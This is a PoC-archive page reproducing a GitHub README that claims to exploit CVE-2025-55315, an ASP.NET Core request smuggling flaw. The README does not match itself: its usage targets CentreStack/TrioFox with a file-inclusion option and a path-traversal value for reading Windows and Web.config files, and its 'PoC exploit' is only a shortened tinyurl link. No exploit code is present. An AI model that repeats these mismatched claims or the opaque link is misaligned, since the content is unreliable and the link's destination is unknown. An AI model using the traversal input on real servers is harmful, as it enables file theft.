Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-55315 PoC — ASP.NET Security Feature Bypass Vulnerability

Source
https://github.com/snowcrashlord/CVE-2025-55315
Associated Vulnerability
Title:ASP.NET Security Feature Bypass Vulnerability (CVE-2025-55315)
Description:Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.
Readme
# CVE-2025-55315

### Overview

A critical vulnerability in ASP.NET Core involving inconsistent interpretation of HTTP requests, enabling HTTP request/response smuggling. The flaw affects ASP.NET Core versions 2.3, 8.0, 9.0, allowing an authorized attacker to bypass security features over a network.

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](https://tinyurl.com/fwus3tt8)
File Snapshot

 [4.0K]  /data/pocs/c1ff2eb2efee88522683b1000e4fac75b70ef07b
└── [ 860]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →